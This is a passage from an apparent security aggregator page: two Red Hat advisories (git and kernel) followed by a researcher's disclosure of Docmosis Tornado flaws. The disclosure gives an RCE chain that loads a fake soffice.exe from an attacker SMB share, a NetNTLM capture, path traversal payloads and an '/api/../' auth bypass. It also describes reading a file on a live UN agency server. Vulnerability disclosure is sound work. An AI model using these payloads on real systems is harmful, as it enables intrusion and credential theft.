is an exact copy with complete revision history. This not only allows the  
user to work on and contribute to projects without the need to have  
permission to push the changes to their official repositories, but also  
makes it possible for the user to work with no network connection.

Security Fix(es):

* git: gitattributes parsing integer overflow (CVE-2022-23521)

* git: Heap overflow in `git archive`, `git log --format` leading to RCE  
(CVE-2022-41903)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2162055 - CVE-2022-23521 git: gitattributes parsing integer overflow  
2162056 - CVE-2022-41903 git: Heap overflow in `git archive`, `git log --format` leading to RCE

6. Package List:

Red Hat Enterprise Linux Client Optional (v. 7):

Source:  
git-1.8.3.1-24.el7_9.src.rpm

noarch:  
emacs-git-1.8.3.1-24.el7_9.noarch.rpm  
emacs-git-el-1.8.3.1-24.el7_9.noarch.rpm  
git-all-1.8.3.1-24.el7_9.noarch.rpm  
git-bzr-1.8.3.1-24.el7_9.noarch.rpm  
git-cvs-1.8.3.1-24.el7_9.noarch.rpm  
git-email-1.8.3.1-24.el7_9.noarch.rpm  
git-gui-1.8.3.1-24.el7_9.noarch.rpm  
git-hg-1.8.3.1-24.el7_9.noarch.rpm  
git-instaweb-1.8.3.1-24.el7_9.noarch.rpm  
git-p4-1.8.3.1-24.el7_9.noarch.rpm  
gitk-1.8.3.1-24.el7_9.noarch.rpm  
gitweb-1.8.3.1-24.el7_9.noarch.rpm  
perl-Git-1.8.3.1-24.el7_9.noarch.rpm  
perl-Git-SVN-1.8.3.1-24.el7_9.noarch.rpm

x86_64:  
git-1.8.3.1-24.el7_9.x86_64.rpm  
git-daemon-1.8.3.1-24.el7_9.x86_64.rpm  
git-debuginfo-1.8.3.1-24.el7_9.x86_64.rpm  
git-gnome-keyring-1.8.3.1-24.el7_9.x86_64.rpm  
git-svn-1.8.3.1-24.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

Source:  
git-1.8.3.1-24.el7_9.src.rpm

noarch:  
emacs-git-1.8.3.1-24.el7_9.noarch.rpm  
emacs-git-el-1.8.3.1-24.el7_9.noarch.rpm  
git-all-1.8.3.1-24.el7_9.noarch.rpm  
git-bzr-1.8.3.1-24.el7_9.noarch.rpm  
git-cvs-1.8.3.1-24.el7_9.noarch.rpm  
git-email-1.8.3.1-24.el7_9.noarch.rpm  
git-gui-1.8.3.1-24.el7_9.noarch.rpm  
git-hg-1.8.3.1-24.el7_9.noarch.rpm  
git-instaweb-1.8.3.1-24.el7_9.noarch.rpm  
git-p4-1.8.3.1-24.el7_9.noarch.rpm  
gitk-1.8.3.1-24.el7_9.noarch.rpm  
gitweb-1.8.3.1-24.el7_9.noarch.rpm  
perl-Git-1.8.3.1-24.el7_9.noarch.rpm  
perl-Git-SVN-1.8.3.1-24.el7_9.noarch.rpm

x86_64:  
git-1.8.3.1-24.el7_9.x86_64.rpm  
git-daemon-1.8.3.1-24.el7_9.x86_64.rpm  
git-debuginfo-1.8.3.1-24.el7_9.x86_64.rpm  
git-gnome-keyring-1.8.3.1-24.el7_9.x86_64.rpm  
git-svn-1.8.3.1-24.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
git-1.8.3.1-24.el7_9.src.rpm

noarch:  
perl-Git-1.8.3.1-24.el7_9.noarch.rpm

ppc64:  
git-1.8.3.1-24.el7_9.ppc64.rpm  
git-debuginfo-1.8.3.1-24.el7_9.ppc64.rpm

ppc64le:  
git-1.8.3.1-24.el7_9.ppc64le.rpm  
git-debuginfo-1.8.3.1-24.el7_9.ppc64le.rpm

s390x:  
git-1.8.3.1-24.el7_9.s390x.rpm  
git-debuginfo-1.8.3.1-24.el7_9.s390x.rpm

x86_64:  
git-1.8.3.1-24.el7_9.x86_64.rpm  
git-debuginfo-1.8.3.1-24.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

noarch:  
emacs-git-1.8.3.1-24.el7_9.noarch.rpm  
emacs-git-el-1.8.3.1-24.el7_9.noarch.rpm  
git-all-1.8.3.1-24.el7_9.noarch.rpm  
git-bzr-1.8.3.1-24.el7_9.noarch.rpm  
git-cvs-1.8.3.1-24.el7_9.noarch.rpm  
git-email-1.8.3.1-24.el7_9.noarch.rpm  
git-gui-1.8.3.1-24.el7_9.noarch.rpm  
git-hg-1.8.3.1-24.el7_9.noarch.rpm  
git-instaweb-1.8.3.1-24.el7_9.noarch.rpm  
git-p4-1.8.3.1-24.el7_9.noarch.rpm  
gitk-1.8.3.1-24.el7_9.noarch.rpm  
gitweb-1.8.3.1-24.el7_9.noarch.rpm  
perl-Git-SVN-1.8.3.1-24.el7_9.noarch.rpm

ppc64:  
git-daemon-1.8.3.1-24.el7_9.ppc64.rpm  
git-debuginfo-1.8.3.1-24.el7_9.ppc64.rpm  
git-gnome-keyring-1.8.3.1-24.el7_9.ppc64.rpm  
git-svn-1.8.3.1-24.el7_9.ppc64.rpm

ppc64le:  
git-daemon-1.8.3.1-24.el7_9.ppc64le.rpm  
git-debuginfo-1.8.3.1-24.el7_9.ppc64le.rpm  
git-gnome-keyring-1.8.3.1-24.el7_9.ppc64le.rpm  
git-svn-1.8.3.1-24.el7_9.ppc64le.rpm

s390x:  
git-daemon-1.8.3.1-24.el7_9.s390x.rpm  
git-debuginfo-1.8.3.1-24.el7_9.s390x.rpm  
git-gnome-keyring-1.8.3.1-24.el7_9.s390x.rpm  
git-svn-1.8.3.1-24.el7_9.s390x.rpm

x86_64:  
git-daemon-1.8.3.1-24.el7_9.x86_64.rpm  
git-debuginfo-1.8.3.1-24.el7_9.x86_64.rpm  
git-gnome-keyring-1.8.3.1-24.el7_9.x86_64.rpm  
git-svn-1.8.3.1-24.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
git-1.8.3.1-24.el7_9.src.rpm

noarch:  
perl-Git-1.8.3.1-24.el7_9.noarch.rpm

x86_64:  
git-1.8.3.1-24.el7_9.x86_64.rpm  
git-debuginfo-1.8.3.1-24.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

noarch:  
emacs-git-1.8.3.1-24.el7_9.noarch.rpm  
emacs-git-el-1.8.3.1-24.el7_9.noarch.rpm  
git-all-1.8.3.1-24.el7_9.noarch.rpm  
git-bzr-1.8.3.1-24.el7_9.noarch.rpm  
git-cvs-1.8.3.1-24.el7_9.noarch.rpm  
git-email-1.8.3.1-24.el7_9.noarch.rpm  
git-gui-1.8.3.1-24.el7_9.noarch.rpm  
git-hg-1.8.3.1-24.el7_9.noarch.rpm  
git-instaweb-1.8.3.1-24.el7_9.noarch.rpm  
git-p4-1.8.3.1-24.el7_9.noarch.rpm  
gitk-1.8.3.1-24.el7_9.noarch.rpm  
gitweb-1.8.3.1-24.el7_9.noarch.rpm  
perl-Git-SVN-1.8.3.1-24.el7_9.noarch.rpm

x86_64:  
git-daemon-1.8.3.1-24.el7_9.x86_64.rpm  
git-debuginfo-1.8.3.1-24.el7_9.x86_64.rpm  
git-gnome-keyring-1.8.3.1-24.el7_9.x86_64.rpm  
git-svn-1.8.3.1-24.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-23521  
https://access.redhat.com/security/cve/CVE-2022-41903  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY/3ztdzjgjWX9erEAQgw4g//fI6hgVC3Ds7f4CigbDHZ3G6uJVNLgZCo  
ePiMQ7yQ7QB4UHxl7tUlPxA57z+SdAnSWYXMxE/Q38b8asujPfn+RC/nfRYuDkjy  
03Wl5Jw2x7ctlcab+cX3s/qZ77u4HlUF3Hv0bTdMOF6U3CjLzU7kywPVzWzGid4o  
nDKE+NjehScG/UL6ZzkvaKQr7UQk8Uak7gpoCtMsiTWFkAxA9y3xbzBdnNL77PMK  
tYpIvbGCdP/NgIGvOi2iCTIbKQf+mza6EBJUWMzjstR766icUdzb0NSel9V3tP0s  
w25oR17hCUnkSXy3b/eWFccuodGahO4p/DBxVFfOwVk16q0BkAqm9r8TGqijuNhp  
EDsIfJzHDanCqQEUjjWiwxPNmgUtk6/kqp1A8Vrz0O0OaiTQrWw0LHbwosAj5t1+  
Q5bA9F0iBsBqjxEchrUo5fOPtTV7KNjN5KHA8KQACgXZ+QaT5oCLcOGoxyJzLizO  
eYENky+YuqJbBMo71DsJXMK8ovCqRYKzFI6w3zW9As0imZK72O0jtJYkxeV7E2uw  
N16NG92J3vgn0sq2zb08uxhQY/6YFNd2RDPZB+i4Vx40jZu95gfVNihpD/O9b2dZ  
AUtORmrxTGmgQvR4/0kyuEAW3p94BxA0M0fS7NmH9qfq2HU8tJLoh09t2kM3dX5/  
7Pkb0u+dNFE=  
=sL46  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0978-01

Red Hat Security Advisory 2023-0944-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel security update  
Advisory ID:       RHSA-2023:0944-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0944  
Issue date:        2023-02-28  
CVE Names:         CVE-2022-4378   
=====================================================================

1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 7.7  
Advanced Update Support, Red Hat Enterprise Linux 7.7 Telco Extended Update  
Support, and Red Hat Enterprise Linux 7.7 Update Services for SAP  
Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Server AUS (v. 7.7) - noarch, x86_64  
Red Hat Enterprise Linux Server E4S (v. 7.7) - noarch, ppc64le, x86_64  
Red Hat Enterprise Linux Server Optional AUS (v. 7.7) - x86_64  
Red Hat Enterprise Linux Server Optional E4S (v. 7.7) - ppc64le, x86_64  
Red Hat Enterprise Linux Server Optional TUS (v. 7.7) - x86_64  
Red Hat Enterprise Linux Server TUS (v. 7.7) - noarch, x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux  
operating system.

Security Fix(es):

* kernel: stack overflow in do_proc_dointvec and proc_skip_spaces  
(CVE-2022-4378)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2152548 - CVE-2022-4378 kernel: stack overflow in do_proc_dointvec and proc_skip_spaces

6. Package List:

Red Hat Enterprise Linux Server AUS (v. 7.7):

Source:  
kernel-3.10.0-1062.71.1.el7.src.rpm

noarch:  
kernel-abi-whitelists-3.10.0-1062.71.1.el7.noarch.rpm  
kernel-doc-3.10.0-1062.71.1.el7.noarch.rpm

x86_64:  
bpftool-3.10.0-1062.71.1.el7.x86_64.rpm  
bpftool-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-devel-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-devel-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-headers-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-libs-3.10.0-1062.71.1.el7.x86_64.rpm  
perf-3.10.0-1062.71.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
python-perf-3.10.0-1062.71.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server E4S (v. 7.7):

Source:  
kernel-3.10.0-1062.71.1.el7.src.rpm

noarch:  
kernel-abi-whitelists-3.10.0-1062.71.1.el7.noarch.rpm  
kernel-doc-3.10.0-1062.71.1.el7.noarch.rpm

ppc64le:  
bpftool-3.10.0-1062.71.1.el7.ppc64le.rpm  
bpftool-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-bootwrapper-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-debug-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-debug-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-devel-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-headers-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-tools-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-tools-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-tools-libs-3.10.0-1062.71.1.el7.ppc64le.rpm  
perf-3.10.0-1062.71.1.el7.ppc64le.rpm  
perf-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm  
python-perf-3.10.0-1062.71.1.el7.ppc64le.rpm  
python-perf-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm

x86_64:  
bpftool-3.10.0-1062.71.1.el7.x86_64.rpm  
bpftool-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-devel-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-devel-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-headers-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-libs-3.10.0-1062.71.1.el7.x86_64.rpm  
perf-3.10.0-1062.71.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
python-perf-3.10.0-1062.71.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server TUS (v. 7.7):

Source:  
kernel-3.10.0-1062.71.1.el7.src.rpm

noarch:  
kernel-abi-whitelists-3.10.0-1062.71.1.el7.noarch.rpm  
kernel-doc-3.10.0-1062.71.1.el7.noarch.rpm

x86_64:  
bpftool-3.10.0-1062.71.1.el7.x86_64.rpm  
bpftool-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-devel-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-devel-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-headers-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-libs-3.10.0-1062.71.1.el7.x86_64.rpm  
perf-3.10.0-1062.71.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
python-perf-3.10.0-1062.71.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional AUS (v. 7.7):

x86_64:  
bpftool-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-libs-devel-3.10.0-1062.71.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional E4S (v. 7.7):

ppc64le:  
bpftool-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-debug-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-debug-devel-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-tools-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-tools-libs-devel-3.10.0-1062.71.1.el7.ppc64le.rpm  
perf-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm  
python-perf-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm

x86_64:  
bpftool-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-libs-devel-3.10.0-1062.71.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional TUS (v. 7.7):

x86_64:  
bpftool-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-libs-devel-3.10.0-1062.71.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-4378  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY/3zrdzjgjWX9erEAQiWkQ//d8OoWO+BV0oKuhGiTvH7W/uP29aDTHe+  
iMd8yztBdHqZ4kpxI8Ro4nF64BYcnGhhY2fOQ54qPiqSyhooqz7QWrSzwdFvEPzX  
UeQCOtOj6Z3RBhfiyd1a8JLeK0hasCHJL6kR2Onipqpzvi7D2ihjFcy8censOxtp  
roi3FPBJzlC/PmmKgwFdDjFe2G9ZbiZ7plTIkjgzkFGpWah1An/OG0/rBmIDsUpf  
65bZZ6H7jyp8jUg8TCwfONxnJx7wlfev/ixZb/9ZPxkqqYq+mLhCLf3OLnSo0rNZ  
CUAQtbanYKT9x5fUU72diVG3h5pe1LD+8sG7se8pWNSHp3leaN5MB+Jdt5f0MTAn  
EJ4uI5ABEdoLeqbprNedtB8ngLhmNBrd8056T1oXEQDUDLjSJeYJpIbWZkpIG2WU  
1qjsEG5GssicaNx3NMf6Q528UwTpGbhKxHVfY35mqCbmGxWoMZC+5cjtPZQkHkEQ  
Qnp40RMP5bRGOlfbMeIb8vi7lrfvna1JsWm697zGJWD+CA9d02Td+kW58BITyfVc  
weJ8YOgvrgPq+61rNU/2yEoXoSdUlvJ0ajl+JYhod4RVpNZcEMK/lqu6QYejHNc2  
BlIN2OvZo3gVoslDDZq06NFd94p9spubcGXgWMN1zjNcqAV4wgjpnvzdjqj2cQTq  
JFTz9qAr0JE=  
=E5Jd  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0944-01

An issue was discovered in Docmosis Tornado prior to version 2.9.5. An authenticated attacker can change the Office directory setting pointing to an arbitrary remote network path. This triggers the execution of the soffice binary under the attackers control leading to arbitrary remote code execution (RCE).

Recently, I did a non-exhaustive security product review on a Document Generator Engine, named **Docmosis**. A system I targeted used **Docmosis Tornado** in its latest version **2.9.4**. I’ll give you a walkthrough based on my local lab installation with a Proof-of-Concept exploitation on an on-premises system belonging to a specialized agency of the United Nations.

By default, no login is needed to access the web UI :-0. But as we’ll see, even if the password protection is enabled/configured, there is an **Authentication Bypass** which makes all these findings exploitable from an **unauthenticated context** as well. But let’s go through all the findings step by step.

**Remote Code Execution**

This first vulnerability relies on the fact that the web UI field **“Open/Libre Office location”** can be changed, pointing to the _LibreOffice_ installation directory. All configuration changes are persisted after the corresponding _GWT-based_ HTTP POST request is sent to /webserverdownload/configure. The corresponding URL mapping can be found in the web descriptor web.xml.

    <servlet-mapping>
      <servlet-name>ConfigurationServlet</servlet-name>
      <url-pattern>/webserverdownload/configure</url-pattern>
    </servlet-mapping>
    ...
    <servlet>
      <servlet-name>ConfigurationServlet</servlet-name>
      <servlet-class>com.docmosis.webserver.server.ConfigurationServiceImpl</servlet-class>
    </servlet>
    

The responsible Java interface extends com.google.gwt.user.server.rpc.RemoteServiceServlet, finally leading to the implementing class com.docmosis.webserver.server.ConfigurationServiceImpl. The method com.docmosis.webserver.server.ConfigurationServiceImpl.saveConfiguration(ConfigBean) is called then with the parameters given in the request. There exists a validation method com.docmosis.webserver.server.ConfigurationServiceImpl.serverSideValidate(ConfigBean) which checks access to the Office location directory.

    String[] expectedFolders = DMProperties.getStringArray("docmosis.openoffice.location.binary.searchpath", ";");
    boolean subFolderFound = false;
    for (String expected : expectedFolders) {
      File subFolder = new File(officePathFile, expected);
      if (subFolder.canRead() && subFolder.isDirectory()) {
        subFolderFound = true;
        
        break;
      } 
    } 
    

The expectedFolders member seems to be used to check for expected folders matching a valid Office installation. The same is done for the Template directories etc. No further validations with respect to security are done. On a standard Windows installation, an **UNC network share path** could be used to point the Office directory to a remote host. The Office executable soffice.exe is used for converter functions etc. and therefore is observable in the process tree of Docmosis Tornado after being started.

Now, changing the **Open/Libre Office location** value to a remote network share path allows to load an **arbitrary malicious .exe file** named soffice.exe instead. After a restart of Docmosis Tornado, this would be fetched and executed, allowing an attacker to executing arbitrary code on the targeted machine. This already is a critical vulnerability in itself but **requires user interaction** on the server-side for the _restart_. **The web UI does not provide any restart functions**. Looking again at the GWT service implementation, we find the method com.docmosis.webserver.server.ConfigurationServiceImpl.restartServer() which indeed allows exactly this via a properly crafted GWT HTTP request. This makes the **user interaction restriction obsolete**. To following steps have to be taken to prove the Remote Code Execution (RCE).

*   We create a “malicious” soffice.exe file with a C cross compiler with the following code underneath.

    void main()
    {
    	system("cmd.exe /C calc");
    }
    

*   We mimick the directory/file structure of a valid LibreOffice installation on our remote attacker server.
    
*   We provide a fake SMB server with help of the impacket suite.
    
*   We change the Office location in the web UI pointing to this server \\10.137.0.16\myshare\LibreOffice.
    

*   We observe NTLM authentication on our fake SMB server.

*   We trigger the restart of the Tornado service and got code execution, i.e. our malicious soffice.exe got executed, popping a Windows calculator.

Since the targeted server uses NTLM authentication to login to the attacker’s fake SMB server, this could of course be used to capture the **NetNTLM hash**. This hash could be cracked offline, so finally an attacker would have had valid Windows credentials to access the server via other channels.

**Multiple Path Traversals - File Read**

In general, no proper validation of file system operations with respect to traversal attacks can be found. This allows various attack vectors leading to file disclosure out of the context directories specified within the Tornado application.

**Restricted File Read**

First, we show a file read primitive with a few restrictions for the attacker. The **“Source Templates From”** directory is set to C:\Users\user\Desktop\templates in our lab environment.

Using the function _“Creating dummy data based on template”_ in the web UI fills the _Data_ text field automatically so afterwards we can click the _Test_ button to create e.g. a PDF file. Next to our templates directory, mentioned above, we put a file with fake secret data C:\Users\user\Desktop\secretfolder\secret.txt. Now the request is intercepted and a path traversal payload injected into the template reference path.

Indeed, the generated document contains the content of the secret file: a file located at a completely different folder than C:\Users\user\Desktop\templates.

This seems at least be restricted to certain file types but nevertheless is a juicy vulnerability.

**Full File Read**

The most dangerous path traversal vulnerability originates from the service call to /fetch?filename=[SOME_NAME].pdf. This is called after we generated the PDF file above to automatically download the file content from the server.

The corresponding implementation can be found in com.docmosis.webserver.servlet.FetchTmp.doGet(HttpServletRequest, HttpServletResponse). The filename request parameter is used within a String concatenation to retrieve the file.

    filename = request.getParameter("filename");
    filename = System.getProperty("java.io.tmpdir") + "/" + filename;
    

This allows an attacker to again introduce relative path segments, giving access to arbitrary files on the server file system. Here, we show reading the file C:\Windows\win.ini.

**Authentication Bypass**

Even though, the default installation does not require an _Admin password_ being set, the web UI indeed provides a configuration field. To test this, we set a password, clicked the logout button and indeed are redirected to the login page.

Also our full file read vulnerability now cannot be exploited anymore from an unauthenticated content (_still exploitable as authenticated user, though_).

Looking at the web descriptor file web.xml reveals that an authentication filter is set in place for all URI paths.

    <filter-mapping>
    	<filter-name>AuthenticatedCheckFilter</filter-name>
    	<url-pattern>/*</url-pattern>
    </filter-mapping> 
    

Every request has to go through the Java Servlet filter com.docmosis.webserver.servlet.AuthenticatedCheckServlet.doFilter(ServletRequest, ServletResponse, FilterChain). Surprisingly, the authentication check can be bypassed to reach the final chain.doFilter(request, response) call. Responsible for this is the following code path:

    if (!authenticated) // [1]
    {
      if (!isRestCall) { // [2]
    
    
    
        
        WebServerPreferences prefs = WebServerPreferencesStore.getPrefs();
        boolean authenticationRequired = !StringUtilities.isEmpty(prefs.getAdminPassword());
        
        if (authenticationRequired) { // [3]
          
          if (isGWTRPCCall) {
            
            ((HttpServletResponse)response).sendError(401); return;
          } 
          if (!this.authPostUrl.equals(req.getRequestURI())) {
            
            RequestDispatcher rd = req.getRequestDispatcher("/authenticate.jsp");
            rd.forward(request, response);
    
            
            return;
          } 
        }
    } 
    

At \[1\], it is properly checked if the user is already authenticated. If not, the if branch is entered. If this request is not part of a REST call \[2\] and an Admin password is set \[3\], then access is denied. The problem now relies in the check if isRestCall is true/false.

    boolean isRestCall = req.getRequestURI().startsWith("/api/")
    

Our path traversal attack e.g. /fetch?filename=../../../../../Windows/win.ini indeed does not start with /api but at this point of HTTP request processing, a simple bypass is possible due to using the startsWith String method. Using an URI path with relative path segments like /api/../fetch?filename=../../../../../Windows/win.ini bypasses the authentication check and triggers the file read primitive again.

**Internet Exposure Check**

These findings were shared with the vendor and they released **version 2.9.5** to address these issues (I did not validate the patches, though). Checking the exposure rate of this software on the public Internet, one of the systems found was **\[REDACTED\].upu.int**. Even though, this instance was not using the latest version, the same vulnerabilities still worked fine.

As it turned out, this system belongs to the **Universal Postal Union (UPU)**, a specialized agency of the United Nations (UN). Additionally, this system seemed to be part of the official UPU network, i.e. no cloud-hosted instance but rather an entry point to the network of UPU.

The system exposed a web UI of Docmosis Tornado with default configurations, i.e. no authentication needed at all. Even if authentication would have been needed, we already found an **Authentication Bypass**.

To prove the system to be vulnerable, we read the content of C:\Windows\win.ini and provided the report as quickly as possible.

**Acknowledgements**

Many thanks to Carlos from UNICC to forward my requests to UPU quickly. Also the Docmosis team communicated fast and professionally.

P.S.: I’m pretty sure there’re more vulnerabilities in this product. Go, practice and responsibly disclose issues to the Docmosis team. Maybe you’ll find a deserialization vulnerability somewhere _\*hint\*_.

Tag

#js